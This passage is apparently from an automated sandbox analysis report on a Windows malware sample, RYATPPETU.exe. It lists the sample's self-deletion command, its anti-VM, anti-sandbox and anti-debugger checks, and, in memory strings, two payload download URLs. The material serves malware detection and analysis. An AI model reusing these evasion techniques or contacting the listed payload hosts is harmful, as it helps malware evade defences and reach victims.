Show sources

Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: /c del 'C:\Users\user\Desktop\RYATPPETU.exe'			Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://BLUMECONSTRUCTIONLLC.COM/BIN_NXOEAEAGUQ10.BINHTTPS://SOLEPROTECT.DE/BIN_NXOEAEAGUQ10.BIN

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RYATPPETU.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002EE9904 second address: 0000000002EE990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002EE9B6E second address: 0000000002EE9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 6044

Thread sleep time: -32000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\cmmon32.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\RYATPPETU.exe

Code function: 8_2_1E6A6A60 rdtscp

8_2_1E6A6A60

Source: C:\Users\user\Desktop\RYATPPETU.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe

System information queried: ModuleInformation

Jump to behavior

Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 0000000C.00000000.573441250.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 0000000C.00000000.599818995.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: explorer.exe, 0000000C.00000000.598586193.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000C.00000000.574488092.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe

Code function: 8_2_1E6A6A60 rdtscp

8_2_1E6A6A60

Source: C:\Users\user\Desktop\RYATPPETU.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BAC2C mov eax, dword ptr fs:[00000030h]	0_2_022BAC2C
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C005C mov eax, dword ptr fs:[00000030h]	0_2_022C005C
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BE1A6 mov eax, dword ptr fs:[00000030h]	0_2_022BE1A6
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BE9B4 mov eax, dword ptr fs:[00000030h]	0_2_022BE9B4
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68766D mov eax, dword ptr fs:[00000030h]	8_2_1E68766D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B927A mov eax, dword ptr fs:[00000030h]	8_2_1E6B927A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h]	8_2_1E72B260
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h]	8_2_1E72B260
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]	8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]	8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]	8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]	8_2_1E679240
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67E620 mov eax, dword ptr fs:[00000030h]	8_2_1E67E620
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72FE3F mov eax, dword ptr fs:[00000030h]	8_2_1E72FE3F
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h]	8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h]	8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h]	8_2_1E67C600
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A16E0 mov ecx, dword ptr fs:[00000030h]	8_2_1E6A16E0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6876E2 mov eax, dword ptr fs:[00000030h]	8_2_1E6876E2
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748ED6 mov eax, dword ptr fs:[00000030h]	8_2_1E748ED6
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A36CC mov eax, dword ptr fs:[00000030h]	8_2_1E6A36CC
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72FEC0 mov eax, dword ptr fs:[00000030h]	8_2_1E72FEC0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]	8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]	8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]	8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]	8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]	8_2_1E6752A5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F46A7 mov eax, dword ptr fs:[00000030h]	8_2_1E6F46A7
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h]	8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h]	8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h]	8_2_1E740EA5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70FE87 mov eax, dword ptr fs:[00000030h]	8_2_1E70FE87
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h]	8_2_1E6AD294
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h]	8_2_1E6AD294
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67DB60 mov ecx, dword ptr fs:[00000030h]	8_2_1E67DB60
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748F6A mov eax, dword ptr fs:[00000030h]	8_2_1E748F6A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67DB40 mov eax, dword ptr fs:[00000030h]	8_2_1E67DB40
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68EF40 mov eax, dword ptr fs:[00000030h]	8_2_1E68EF40
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748B58 mov eax, dword ptr fs:[00000030h]	8_2_1E748B58
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67F358 mov eax, dword ptr fs:[00000030h]	8_2_1E67F358
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h]	8_2_1E674F2E
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h]	8_2_1E674F2E
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AE730 mov eax, dword ptr fs:[00000030h]	8_2_1E6AE730
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h]	8_2_1E70FF10
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h]	8_2_1E70FF10
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E73131B mov eax, dword ptr fs:[00000030h]	8_2_1E73131B
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h]	8_2_1E74070D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h]	8_2_1E74070D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E745BA5 mov eax, dword ptr fs:[00000030h]	8_2_1E745BA5
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h]	8_2_1E681B8F
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h]	8_2_1E681B8F
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E73138A mov eax, dword ptr fs:[00000030h]	8_2_1E73138A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E732073 mov eax, dword ptr fs:[00000030h]	8_2_1E732073
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E741074 mov eax, dword ptr fs:[00000030h]	8_2_1E741074
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69746D mov eax, dword ptr fs:[00000030h]	8_2_1E69746D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h]	8_2_1E70C450
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h]	8_2_1E70C450
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]	8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]	8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]	8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]	8_2_1E68B02A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6ABC2C mov eax, dword ptr fs:[00000030h]	8_2_1E6ABC2C
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h]	8_2_1E744015
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h]	8_2_1E744015
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]	8_2_1E731C06
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h]	8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h]	8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h]	8_2_1E6F7016
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h]	8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h]	8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h]	8_2_1E74740D
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E7314FB mov eax, dword ptr fs:[00000030h]	8_2_1E7314FB
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]	8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov ecx, dword ptr fs:[00000030h]	8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]	8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]	8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]	8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]	8_2_1E70B8D0
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748CD6 mov eax, dword ptr fs:[00000030h]	8_2_1E748CD6
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B90AF mov eax, dword ptr fs:[00000030h]	8_2_1E6B90AF
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AF0BF mov ecx, dword ptr fs:[00000030h]	8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h]	8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h]	8_2_1E6AF0BF
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679080 mov eax, dword ptr fs:[00000030h]	8_2_1E679080
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h]	8_2_1E6F3884
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h]	8_2_1E6F3884
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h]	8_2_1E67B171
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h]	8_2_1E67B171
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h]	8_2_1E69C577
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h]	8_2_1E69C577
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B3D43 mov eax, dword ptr fs:[00000030h]	8_2_1E6B3D43
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h]	8_2_1E69B944
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h]	8_2_1E69B944
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F3540 mov eax, dword ptr fs:[00000030h]	8_2_1E6F3540
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E697D50 mov eax, dword ptr fs:[00000030h]	8_2_1E697D50
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748D34 mov eax, dword ptr fs:[00000030h]	8_2_1E748D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]	8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]	8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]	8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]	8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov ecx, dword ptr fs:[00000030h]	8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h]	8_2_1E6A513A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h]	8_2_1E6A513A
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h]	8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h]	8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h]	8_2_1E6A4D3B
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67AD30 mov eax, dword ptr fs:[00000030h]	8_2_1E67AD30
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]	8_2_1E683D34
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h]	8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h]	8_2_1E679100
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h]	8_2_1E679100
